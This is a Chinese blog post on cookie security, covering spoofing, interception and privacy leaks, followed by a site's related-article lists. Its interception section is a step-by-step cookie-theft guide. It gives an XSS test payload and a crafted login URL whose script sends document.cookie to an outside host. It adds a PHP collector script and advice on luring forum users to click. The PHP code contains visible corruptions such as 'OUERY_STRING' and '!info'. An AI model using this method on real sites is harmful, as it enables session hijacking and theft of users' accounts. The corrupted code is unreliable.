深入分析Cookie的安全性问题


Posted in Javascript onMarch 01, 2015

Cookie的目的是为用户带来方便,为网站带来增值,一般情况下不会造成严重的安全威胁。Cookie文件不能作为代码执行,也不会传送病毒,它为用户所专有并只能由创建它的服务器来读取。另外,浏览器一般只允许存放300个Cookie,每个站点最多存放20个Cookie,每个Cookie的大小限制为4KB,因此,Cookie不会塞满硬盘,更不会被用作"拒绝服务"攻击手段。

但是,Cookie作为用户身份的替代,其安全性有时决定了整个系统的安全性,Cookie的安全性问题不容忽视。

(1)Cookie欺骗 Cookie记录了用户的帐户ID、密码之类的信息,通常使用MD5方法加密后在网上传递。经过加密处理后的信息即使被网络上一些别有用心的人截获也看不懂。然而,现在存在的问题是,截获Cookie的人不需要知道这些字符串的含义,只要把别人的Cookie向服务器提交,并且能够通过验证,就可以冒充受害人的身份登陆网站,这种行为叫做Cookie欺骗。
非法用户通过Cookie欺骗获得相应的加密密钥,从而访问合法用户的所有个性化信息,包括用户的E-mail甚至帐户信息,对个人信息造成严重危害。
(2)Cookie截获
Cookie以纯文本的形式在浏览器和服务器之间传送,很容易被他人非法截获和利用。任何可以截获Web通信的人都可以读取Cookie。
Cookie被非法用户截获后,然后在其有效期内重放,则此非法用户将享有合法用户的权益。例如,对于在线阅读,非法用户可以不支付费用即可享受在线阅读电子杂志。

Cookie截获的手段有以下一些:

(1)用编程手段截获Cookie。下面分析其手法,该方法分两步完成。

步骤一:定位需要收集Cookie的网站,对其进行分析并构造URL。 首先打开要收集Cookie的网站,这里假设是http://www.XXX.net,登陆网站输入用户名"<Al>"(不含引号),对数据进行分析抓包,得到如下代码:
http://www.XXX.net/tXl/login/login.pl?username=<Al>&passwd=&ok.X=28&ok.y=6;
将其中"<Al>"更换为:
"<script>alert(document.cookie)</script>"再试,如果执行成功,就开始构造URL:
http://www.XXX.net/tXl/login/login.pl?username=<script>window.open ("http://www.cbifamily.org/cbi.php?"%2bdocument.cookie)</script>&passwd=&ok.X=28&ok.y=6.
其中http://www.cbifamily.org/cbi.php是用户能够控制的某台主机上的一个脚本。需要注意的是"%2b"为符号"+"的URL编码,因为"+"将被作为空格处理。该URL即可在论坛中发布,诱使别人点击。

步骤二:编制收集Cookie的PHP脚本,并将其放到用户可以控制的网站上,当不知情者点击了构造的URL后可以执行该PHP代码。该脚本的具体内容如下:

<?php 

$info=getenv("OUERY_STRING"); 

if($info){  

$fp=fopen("info.tXt","a");  

fwrite($fp,!info."\n"); 

fclose($fp);

} 

header("Location:http://www.XXX.net");

?>

将这段代码放到网络里,则能够收集所有人的Cookie。如果一个论坛允许HTML代码或者允许使用Flash标签,就可以利用这些技术收集Cookie的代码放到论坛里,然后给帖子取一个吸引人的主题,写上有趣的内容,很快就可收集到大量的Cookie。在论坛上,有许多人的密码就是被这种方法盗走的。
(2)利用Flash的代码隐患截获Cookie。Flash中有一个getURL()函数。Flash可以利用这个函数自动打开指定的网页,它可能把用户引向一个包含恶意代码的网站。例如,当用户在电脑上欣赏Flash动画时,动画帧里的代码可能已经悄悄地连上网,并打开了一个极小的包含有特殊代码的页面,这个页面可以收集Cookie、也可以做一些其他有害的事情。网站无法禁止Flash的这种作为,因为这是Flash文件的内部功能。
(3)Cookie泄漏网络隐私
Cookie导致网络隐私泄密的主要原因是:!商业利益驱动。随着电子商务的兴起和互联网上巨大商机的出现,一些网站和机构滥用Cookie,未经访问者的许可,利用搜索引擎技术、数据挖掘技术甚至是网络欺骗技术搜集他人的个人资料,达到构建用户数据库、发送广告等营利目的,造成用户个人隐私的泄漏。"Cookie信息传递的开放性。Cookie文件具有特殊的传递流程 和文本特性,在服务器和客户端之间传送未经安全加密的Cook-ie文件,易导致个人信息的泄密。

以上都是个人对于cookie安全性的理解,如有遗漏还请大家能够指正。

Javascript 相关文章推荐
js获取select标签选中值的两种方式
Jan 09 Javascript
window.location.hash知识汇总
Nov 09 Javascript
node.js实现爬虫教程
Aug 25 Javascript
AngularJS实现一次监听多个值发生的变化
Aug 31 Javascript
JS中BOM相关知识点总结(必看篇)
Nov 22 Javascript
利用JavaScript如何查询某个值是否数组内
Jul 30 Javascript
webpack 1.x升级过程中的踩坑总结大全
Aug 09 Javascript
关于js的三种使用方式(行内js、内部js、外部js)的程序代码
May 05 Javascript
vue-cli 首屏加载优化问题
Nov 06 Javascript
Vue源码学习之关于对Array的数据侦听实现
Apr 23 Javascript
vue 翻页组件vue-flip-page效果
Feb 05 Javascript
12 种使用Vue 的最佳做法
Mar 30 Javascript
浅谈JavaScript事件的属性列表
Mar 01 #Javascript
浅析javascript中的DOM
Mar 01 #Javascript
javascript中的正则表达式使用指南
Mar 01 #Javascript
JQuery中使文本框获得焦点的方法实例分析
Feb 28 #Javascript
jQuery实现折线图的方法
Feb 28 #Javascript
js中split和replace的用法实例
Feb 28 #Javascript
jQuery实现菜单感应鼠标滑动动画效果的方法
Feb 28 #Javascript
You might like
PHP大小写问题:函数名和类名不区分,变量名区分
2013/06/17 PHP
Javascript下的keyCode键码值表
2007/04/10 Javascript
js左右弹性滚动对联广告代码分享
2014/02/19 Javascript
JavaScript中document.forms[0]与getElementByName区别
2015/01/21 Javascript
通过实例理解javascript中没有函数重载的概念
2015/06/03 Javascript
jquery与ajax获取特殊字符实例详解
2017/01/08 Javascript
Javascript 高性能之递归,迭代,查表法详解及实例
2017/01/08 Javascript
vue事件修饰符和按键修饰符用法总结
2017/07/25 Javascript
Dropify.js图片宽高自适应的方法
2017/11/27 Javascript
微信小程序实现全国机场索引列表
2018/01/31 Javascript
js实现二级菜单点击显示当前内容效果
2018/04/28 Javascript
原生js拖拽实现图形伸缩效果
2020/02/10 Javascript
Python中的类学习笔记
2014/09/23 Python
Python3.5编程实现修改IIS WEB.CONFIG的方法示例
2017/08/18 Python
python交互式图形编程实例(一)
2017/11/17 Python
python对视频画框标记后保存的方法
2018/12/07 Python
快速解决pyqt5窗体关闭后子线程不同时退出的问题
2019/06/19 Python
python通过matplotlib生成复合饼图
2020/02/06 Python
python程序输出无内容的解决方式
2020/04/09 Python
解决keras使用cov1D函数的输入问题
2020/06/29 Python
使用Django的JsonResponse返回数据的实现
2021/01/15 Python
python 利用matplotlib在3D空间绘制二次抛物面的案例
2021/02/06 Python
世界最大的票务市场:viagogo
2017/02/16 全球购物
介绍一下常见的木马种类
2014/11/15 面试题
数控专业大学生的自我鉴定
2013/11/13 职场文书
会计实习自我鉴定
2013/12/04 职场文书
学生会主席就职演讲稿
2014/01/14 职场文书
2014年创卫实施方案
2014/02/18 职场文书
管事部库房保管员岗位职责
2014/02/21 职场文书
个人委托书范本汇总
2014/10/01 职场文书
运动会广播稿200字(10篇)
2014/10/12 职场文书
2014年乡镇纪委工作总结
2014/12/19 职场文书
2015年学雷锋活动总结
2015/02/06 职场文书
清洁工个人总结
2015/03/04 职场文书
ROS系统将python包编译为可执行文件的简单步骤
2021/07/25 Python
原型和原型链 prototype和proto的区别详情
2021/11/02 Javascript